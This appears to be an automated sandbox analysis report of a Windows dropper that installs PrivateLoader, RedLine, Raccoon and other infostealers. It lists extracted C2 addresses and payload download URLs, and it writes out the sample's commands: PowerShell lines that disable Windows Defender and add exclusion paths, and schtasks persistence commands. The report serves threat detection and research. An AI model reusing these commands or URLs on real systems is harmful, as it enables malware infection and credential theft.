Analysis
-
max time kernel
22s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
08-08-2022 11:02
Static task
static1
Behavioral task
behavioral1
Sample
3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
Resource
win10v2004-20220721-en
General
-
Target
3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
-
Size
6.0MB
-
MD5
fcbeec6987d0ea994400e26f1a4b9f66
-
SHA1
b213226ad9ca5660735a5df6d6f73e814d1defeb
-
SHA256
3f95733711b8f39ff7bc3458ff49ef57cd4411f3a813d648654e76c1ae7e8ea2
-
SHA512
4c6c6ae7412ebb0b9f4c3c6ab5f3bcd29b0fc56c1fed55f54c95f22926799da23751e8f1b928398e72292eeda91923aa4f623cf68d93624dbcfbf08323fa48f2
Malware Config
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
-
payload_url
https://cdn.discordapp.com/attachments/1004293542186848319/1005419918478540852/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1004293542186848319/1005419885670711407/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
sert23
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
media26
91.121.67.60:23325
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
raccoon
afb5c633c4650f69312baef49db9dfa4
http://77.73.132.74
Extracted
raccoon
839b5f035af17fe32dbee0ca113be5fc
http://89.185.85.53/
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 348 3472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6840 3472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6900 3472 rundll32.exe -
Raccoon Stealer payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/5984-335-0x0000000000400000-0x0000000000482000-memory.dmp family_raccoon behavioral2/memory/5984-334-0x0000000002EC0000-0x0000000002ED6000-memory.dmp family_raccoon behavioral2/memory/2324-377-0x0000000000340000-0x0000000000DEE000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4604-264-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4604-265-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/5588-300-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5588-301-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exe family_socelars -
OnlyLogger payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4976-292-0x0000000000660000-0x00000000006AC000-memory.dmp family_onlylogger behavioral2/memory/4976-293-0x0000000000400000-0x000000000058E000-memory.dmp family_onlylogger behavioral2/memory/4976-326-0x0000000000400000-0x000000000058E000-memory.dmp family_onlylogger -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 26 4676 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
Processes:
setup_installer.exesetup_install.exeWed189277fa467071b4.exeWed188c3010d35.exeWed18b44c8630.exeWed18b39e5016b09c0.exeWed18bc651a8ec.exeWed183acbd9650c5ba88.exeWerFault.exeWed18d947df9c44e3.exeWed1811682666.exeWed186a2b91bd4e9.exeWed18d14c752adf99.exeWed180cd523402090.exeWed18e6324bbde126d.exeWed18be8c3224a5.exeWed18b44c8630.tmpWed182283564f1d8.exeWed18b44c8630.exeWed18b44c8630.tmpWed18be8c3224a5.exeWed18e6324bbde126d.exez1HFJkPKWMLYRf.EXEfind.exeVIeEVfFWG.eXEWed189277fa467071b4.exepid process 2740 setup_installer.exe 4052 setup_install.exe 4208 Wed189277fa467071b4.exe 4248 Wed188c3010d35.exe 4264 Wed18b44c8630.exe 4356 Wed18b39e5016b09c0.exe 4440 Wed18bc651a8ec.exe 4452 Wed183acbd9650c5ba88.exe 4512 WerFault.exe 4536 Wed18d947df9c44e3.exe 4572 Wed1811682666.exe 4664 Wed186a2b91bd4e9.exe 4676 Wed18d14c752adf99.exe 4652 Wed180cd523402090.exe 4688 Wed18e6324bbde126d.exe 4784 Wed18be8c3224a5.exe 4808 Wed18b44c8630.tmp 4976 Wed182283564f1d8.exe 4472 Wed18b44c8630.exe 3784 Wed18b44c8630.tmp 5144 Wed18be8c3224a5.exe 4604 Wed18e6324bbde126d.exe 5552 z1HFJkPKWMLYRf.EXE 5416 find.exe 5604 VIeEVfFWG.eXE 5588 Wed189277fa467071b4.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
z1HFJkPKWMLYRf.EXEVIeEVfFWG.eXE3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exesetup_installer.exeWed18b44c8630.tmpFenix.bmp.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation z1HFJkPKWMLYRf.EXE Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation VIeEVfFWG.eXE Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation 3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation Wed18b44c8630.tmp Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation Fenix.bmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 9 IoCs
Processes:
setup_install.exeWed18b44c8630.tmpWed18b44c8630.tmpDA2KD610K7C5090.exepid process 4052 setup_install.exe 4052 setup_install.exe 4052 setup_install.exe 4052 setup_install.exe 4052 setup_install.exe 4052 setup_install.exe 4808 Wed18b44c8630.tmp 3784 Wed18b44c8630.tmp 3952 DA2KD610K7C5090.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 284 ipinfo.io 110 ipinfo.io 111 ipinfo.io 283 ipinfo.io 291 ipinfo.io 336 ipinfo.io 350 ipinfo.io 29 ip-api.com 71 freegeoip.app 129 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
Wed18e6324bbde126d.exeWed189277fa467071b4.exedescription pid process target process PID 4688 set thread context of 4604 4688 Wed18e6324bbde126d.exe Wed18e6324bbde126d.exe PID 4208 set thread context of 5588 4208 Wed189277fa467071b4.exe Wed189277fa467071b4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 51 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5052 4052 WerFault.exe setup_install.exe 5912 4976 WerFault.exe Wed182283564f1d8.exe 2224 4976 WerFault.exe Wed182283564f1d8.exe 5360 3952 WerFault.exe rundll32.exe 5064 4976 WerFault.exe Wed182283564f1d8.exe 4512 4976 WerFault.exe Wed182283564f1d8.exe 5344 4976 WerFault.exe Wed182283564f1d8.exe 6068 4976 WerFault.exe Wed182283564f1d8.exe 5456 4976 WerFault.exe Wed182283564f1d8.exe 5844 4976 WerFault.exe Wed182283564f1d8.exe 5704 4976 WerFault.exe Wed182283564f1d8.exe 5724 4728 WerFault.exe Mixruzki1.bmp.exe 6044 5080 WerFault.exe Mixruzki1.bmp.exe 5084 4312 WerFault.exe 6523.exe.exe 5724 4728 WerFault.exe Mixruzki1.bmp.exe 3704 5080 WerFault.exe Mixruzki1.bmp.exe 5908 4728 WerFault.exe Mixruzki1.bmp.exe 5856 5080 WerFault.exe Mixruzki1.bmp.exe 6512 4728 WerFault.exe Mixruzki1.bmp.exe 6544 5080 WerFault.exe Mixruzki1.bmp.exe 6912 4728 WerFault.exe Mixruzki1.bmp.exe 7040 5080 WerFault.exe Mixruzki1.bmp.exe 7088 6860 WerFault.exe rundll32.exe 7112 6932 WerFault.exe rundll32.exe 824 4728 WerFault.exe Mixruzki1.bmp.exe 6400 5080 WerFault.exe Mixruzki1.bmp.exe 7092 4728 WerFault.exe Mixruzki1.bmp.exe 5136 5080 WerFault.exe Mixruzki1.bmp.exe 6760 6768 WerFault.exe mixinte.bmp.exe 3816 2740 WerFault.exe mixinte.bmp.exe 2012 7048 WerFault.exe chrome.exe.exe 4264 5080 WerFault.exe Mixruzki1.bmp.exe 7092 4728 WerFault.exe Mixruzki1.bmp.exe 6040 6768 WerFault.exe mixinte.bmp.exe 6820 2740 WerFault.exe mixinte.bmp.exe 7400 6768 WerFault.exe mixinte.bmp.exe 7508 5080 WerFault.exe Mixruzki1.bmp.exe 7544 2740 WerFault.exe mixinte.bmp.exe 7568 4728 WerFault.exe Mixruzki1.bmp.exe 7972 6768 WerFault.exe mixinte.bmp.exe 8064 2740 WerFault.exe mixinte.bmp.exe 7660 6768 WerFault.exe mixinte.bmp.exe 7400 2740 WerFault.exe mixinte.bmp.exe 2196 6768 WerFault.exe mixinte.bmp.exe 7972 1028 WerFault.exe bezon.bmp.exe 7228 2740 WerFault.exe mixinte.bmp.exe 7416 5000 WerFault.exe bezon.bmp.exe 2188 2740 WerFault.exe mixinte.bmp.exe 7724 6768 WerFault.exe mixinte.bmp.exe 7276 6768 WerFault.exe mixinte.bmp.exe 7016 2740 WerFault.exe mixinte.bmp.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Wed18d947df9c44e3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed18d947df9c44e3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed18d947df9c44e3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed18d947df9c44e3.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5360 schtasks.exe 5704 schtasks.exe 7792 schtasks.exe 8076 schtasks.exe 7652 schtasks.exe 8052 schtasks.exe 3840 schtasks.exe 2476 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 7872 tasklist.exe 5744 tasklist.exe 7936 tasklist.exe 7500 tasklist.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7920 taskkill.exe 5656 taskkill.exe 6048 taskkill.exe 6140 taskkill.exe 5932 taskkill.exe 2296 taskkill.exe -
Runs ping.exe 1 TTPs 6 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 8172 PING.EXE 5520 PING.EXE 8152 PING.EXE 7396 PING.EXE 3236 PING.EXE 7972 PING.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 48 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exeWerFault.exeWed18d947df9c44e3.exepid process 1568 powershell.exe 1568 powershell.exe 2196 powershell.exe 2196 powershell.exe 2196 WerFault.exe 2196 WerFault.exe 1568 powershell.exe 1568 powershell.exe 4536 Wed18d947df9c44e3.exe 4536 Wed18d947df9c44e3.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.exeWed186a2b91bd4e9.exeWed1811682666.exepowershell.exeWerFault.exetaskkill.exeutube.bmp.exeConhost.exedescription pid process Token: SeDebugPrivilege 1568 powershell.exe Token: SeCreateTokenPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeAssignPrimaryTokenPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeLockMemoryPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeIncreaseQuotaPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeMachineAccountPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeTcbPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeSecurityPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeTakeOwnershipPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeLoadDriverPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeSystemProfilePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeSystemtimePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeProfSingleProcessPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeIncBasePriorityPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeCreatePagefilePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeCreatePermanentPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeBackupPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeRestorePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeShutdownPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeDebugPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeAuditPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeSystemEnvironmentPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeChangeNotifyPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeRemoteShutdownPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeUndockPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeSyncAgentPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeEnableDelegationPrivilege 4664 Wed186a2b91bd4e9.exe Token: SeManageVolumePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeImpersonatePrivilege 4664 Wed186a2b91bd4e9.exe Token: SeCreateGlobalPrivilege 4664 Wed186a2b91bd4e9.exe Token: 31 4664 Wed186a2b91bd4e9.exe Token: 32 4664 Wed186a2b91bd4e9.exe Token: 33 4664 Wed186a2b91bd4e9.exe Token: 34 4664 Wed186a2b91bd4e9.exe Token: 35 4664 Wed186a2b91bd4e9.exe Token: SeDebugPrivilege 4572 Wed1811682666.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeDebugPrivilege 4440 WerFault.exe Token: SeDebugPrivilege 5656 taskkill.exe Token: SeDebugPrivilege 6048 utube.bmp.exe Token: SeDebugPrivilege 6140 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 548 wrote to memory of 2740 548 3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe setup_installer.exe PID 548 wrote to memory of 2740 548 3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe setup_installer.exe PID 548 wrote to memory of 2740 548 3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe setup_installer.exe PID 2740 wrote to memory of 4052 2740 setup_installer.exe setup_install.exe PID 2740 wrote to memory of 4052 2740 setup_installer.exe setup_install.exe PID 2740 wrote to memory of 4052 2740 setup_installer.exe setup_install.exe PID 4052 wrote to memory of 3864 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 3864 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 3864 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1588 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1588 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1588 4052 setup_install.exe cmd.exe PID 3864 wrote to memory of 2196 3864 cmd.exe powershell.exe PID 3864 wrote to memory of 2196 3864 cmd.exe powershell.exe PID 3864 wrote to memory of 2196 3864 cmd.exe powershell.exe PID 1588 wrote to memory of 1568 1588 cmd.exe powershell.exe PID 1588 wrote to memory of 1568 1588 cmd.exe powershell.exe PID 1588 wrote to memory of 1568 1588 cmd.exe powershell.exe PID 4052 wrote to memory of 548 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 548 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 548 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2424 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2424 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2424 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 532 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 532 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 532 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2476 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2476 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 2476 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1492 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1492 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1492 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1656 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1656 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 1656 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 3384 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 3384 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 3384 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4112 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4112 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4112 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4136 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4136 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4136 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4168 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4168 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4168 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4192 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4192 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4192 4052 setup_install.exe cmd.exe PID 2424 wrote to memory of 4208 2424 cmd.exe Wed189277fa467071b4.exe PID 2424 wrote to memory of 4208 2424 cmd.exe Wed189277fa467071b4.exe PID 2424 wrote to memory of 4208 2424 cmd.exe Wed189277fa467071b4.exe PID 4052 wrote to memory of 4224 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4224 4052 setup_install.exe cmd.exe PID 4052 wrote to memory of 4224 4052 setup_install.exe cmd.exe PID 548 wrote to memory of 4248 548 cmd.exe Wed188c3010d35.exe PID 548 wrote to memory of 4248 548 cmd.exe Wed188c3010d35.exe PID 548 wrote to memory of 4248 548 cmd.exe Wed188c3010d35.exe PID 2476 wrote to memory of 4264 2476 cmd.exe Wed18b44c8630.exe PID 2476 wrote to memory of 4264 2476 cmd.exe Wed18b44c8630.exe PID 2476 wrote to memory of 4264 2476 cmd.exe Wed18b44c8630.exe PID 4052 wrote to memory of 4288 4052 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe"C:\Users\Admin\AppData\Local\Temp\3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed188c3010d35.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed188c3010d35.exeWed188c3010d35.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\TMt07n51l4E4aQ23Jfh5Pms_.exe"C:\Users\Admin\Documents\TMt07n51l4E4aQ23Jfh5Pms_.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"8⤵
-
C:\Windows\system32\cmd.exe/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'10⤵
-
C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Suo.ppam & ping -n 5 localhost9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\SysWOW64\cmd.execmd10⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"11⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mIKZUERRcdogxRWVUqrYiUvVLTbpecknKxaeazHqEtakMEgUAbPEdtHFkPhwiIPZyJEZnUCBarxeClouFCIFGHoFMNQDyGTVfaueqgcGVhkhKFrqGivEZpabBYhLrYvMlnNptyu$" Avvelenate.ppam11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 511⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Disconosci.exe.pifDisconosci.exe.pif r11⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost10⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\TapiUnattend.exeTapiUnattend9⤵
-
C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 4529⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 8049⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 7769⤵
- Program crash
-
